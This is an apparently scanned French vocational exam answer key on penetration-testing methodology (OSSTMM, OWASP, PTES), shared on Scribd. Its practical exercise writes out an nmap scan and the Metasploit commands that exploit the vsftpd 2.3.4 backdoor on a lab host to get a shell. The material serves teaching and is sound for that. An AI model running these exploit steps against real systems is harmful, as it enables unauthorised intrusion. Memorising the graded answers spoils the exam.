0% ont trouvé ce document utile (0 vote)
826 vues4 pages

EFMR202 Corrigé

EFMR 202 ofppt

Transféré par

Mohammed arharbi
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd
0% ont trouvé ce document utile (0 vote)
826 vues4 pages

EFMR202 Corrigé

EFMR 202 ofppt

Transféré par

Mohammed arharbi
Copyright
© © All Rights Reserved
Nous prenons très au sérieux les droits relatifs au contenu. Si vous pensez qu’il s’agit de votre contenu, signalez une atteinte au droit d’auteur ici.
Formats disponibles
Téléchargez aux formats PDF, TXT ou lisez en ligne sur Scribd

Direction Régionale RABAT-SALÉ-KENITRA

Intitulé du module : Méthodologies des tests d’intrusions

Théorie: (15 points)

Exercice 1

Question 1
Choisir, la ou les bonnes réponses qui décrivent le mieux une simulation d’attaque de type externe ou interne :

- Tester les filtres de contenu Web et les accès physiques : attaque type …………..interne…………………

- Simuler l’attaque en prétendant être un client connecté à distance : attaque type …………externe…………………..

Question 2
Quels sont les étapes de mise en œuvre d’un test d’intrusion utilisant la méthode OSSTMM ?
Phase I : Réglementaire :
Examen de la posture, Logistique, Vérification de la détection active –
Phase II : Définitions :
Audit de visibilité, Vérification d'accès, Vérification de la confiance, Vérification des contrôles
Phase III : Phase d'information :
Vérification des processus, Vérification de la configuration, Validation de la propriété, Examen de la ségrégation,
Examen de l'exposition, Veille concurrentielle
Phase IV : Phase de test des commandes interactives
Vérification de quarantaine, Audit des privilèges, Validation de la capacité de survie, Examen des alertes et des
journaux

Question 3
Quelle étape est indispensable à faire en premier lors d’un test d’intrusion selon la méthodologie OWASP ?
Donnez deux exemples de cette opération ?

Lors d’un test d’intrusion et selon la méthodologie OWASP, une collecte d’informations est indispensable en
premier.
Plusieurs exemples, on peut en citer deux :
Énumérer les applications sur le serveur Web - Tester la configuration de l'infrastructure réseau
Question 4
Quelle méthodologie de test d’intrusion doit-on utiliser pour l’approche audit dans chacun des cas suivants :

Cas 1 : Le but final est d’établir un document « open source » en utilisant une démarche automatisable afin
de sécuriser les systèmes d’information.
Méthodologie ……………OSSTMM…………………

Cas 2 : fournir les outils permettant d’apporter une amélioration de la sécurité des applications

Méthodologie ………………OWASP……………

Page 1|4
Question 5
Quelle est la différence entre test d'intrusion et test de vulnérabilité ?

Vulnérabilité a pour objectif de déceler des vulnérabilités connues sur des systèmes, tandis qu'un test
d'intrusions a pour objectif de simuler une attaque, par la découverte et l'exploitation de vulnérabilités.

Pratique : ( 25 points )

Exercice 2 ( 17.5 points )

Dans le cadre de tests d’intrusions et de


vulnérabilités. Vous êtes chargé d’exploiter les
vulnérabilités sur un service réseau interne et
mettre en place une contre-mesure de ces
vulnérabilités.
La topologie utilisée dans le test est la
suivante :

Question 1
En premier temps, vous devez scanner le réseau avec l’outil nmap.
Donnez la commande qui permet d’afficher les ports TCP ouverts dans la machine cible (entre 1 et 2000), les
services associés et leurs versions.

……………… sudo nmap -sS -sV -p1-2000 192.168.1.2………………………………………………………………………

Question 2
Une suite de commandes a été exécutée via l’outil Metasploit sur la machine Kali de votre réseau.
2.1 Quelle est la commande utilisée dans le résultat ci-dessous? Expliquez ce résultat:
msf> ………………………….
Matching Modules
===============
#Name Disclosure Date Rank Check
Description
- ---- ---------------------- ------ ------
---------------
0 exploit/unix/ftp/vsftpd_234_backdoor 2017-09-08 excellent No
VSFTPD v2.3.4 Backdoor Command Execution
msf>

la commande utilisée est search vsftpd


le résultat montre qu’une vulnérabilité a été trouvée sur le serveur vsftpd version 2.3.4
Metasploit contient une porte dérobée qui peut éventuellement aider à pirater le service FTP cible.

2.2 Expliquez le résultat de la commande suivante :


msf>use exploit/unix/ftp/vsftpd_234_backdoor

chargez le module dans la console Metasploit (sélectionne l’exploit associé au service VsFTPd 2.3.4)

Page 2|4
2.3 Expliquez le résultat de la commande suivante :
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options

Afficher les options à définir avant l’exploit

Question 3
Quelle commande permet de définir l’adresse IP de la cible ?

msf exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.1.2


RHOSTS 192.168.1.2

Question 4
Que fait cette commande: msf exploit(unix/ftp/vsftpd_234_backdoor) >exploit
Cette commande permet d’avoir accès à la machine cible (dans notre cas @IP 192.168.1.2).

Question 5
Quel est le but de créer un shell meterpreter ?

Créer un shell meterpreter permet de mieux contrôler la cible.

Exercice 3 (7.5 points)

Question 1

Quel est l’objectif du tableau de bord dans le rapport de synthèse des vulnérabilités ?

Le tableau de bord facilite aux données et résultats du test d’intrusion, y compris l'étendue des travaux, les tâches
et les jalons, la carte des applications et du réseau et bien plus encore.

Question 2
Soit le tableau de bord d’un test d’intrusion :

Vulnérabilité
Description Recommandations
critique
framework Cette faille permet à l’attaquant l’exécution Appliquez les mises à jour de la
Microsoft .NET 4.7 à distance de code arbitraire via un version obsolète selon les
document ou une application malveillante. instructions du fournisseur.

En utilisant les données décrites dans le tableau de bord ci-dessus et en utilisant les données suivantes :
Société : InfoEngeneerV1
Périmètre : système d’information
Objectif du test d’intrusion : tenter de manipuler système d’information afin d’en vérifier la fiabilité.
Equipe : un expert en cybersécurité
Date d’intervention : 05/11/2022
Rédiger le rapport du test d’intrusions (en utilisant le Template PTES).

Page 3|4
Exemple de Corrigé

La société InfoEngeneerV1 a réalisé un test d’intrusion sur son système d’information. Le système n’est pas encore

utilisé en production et a été testé à cette occasion. L’objectif du test d’intrusion était de donner la possibilité à des

spécialistes en informatique indépendants d’attaquer délibérément le système et de tenter de le manipuler afin

d’en vérifier la fiabilité.

Une faille a été trouvée au niveau de framework Microsoft .NET version 4.7. Elle est évaluée et classée comme étant

critique. Cette version permet à un acteur malveillant d'exécuter à distance un code arbitraire via un document ou

une application malveillante. Les résultats de ce test d’intrusion seront intégrés au développement du système. Le

test d’intrusion a été réalisé avec succès le 5 novembre 2022 par un expert en cybersécurité. La faille a été

confirmée. Aucune attaque n’est parvenue à compromettre l’intégrité du système ou de ses composants ni à s’y

introduire. Une solution consiste à appliquer des correctifs pour cette vulnérabilité.

Page 4|4

Vous aimerez peut-être aussi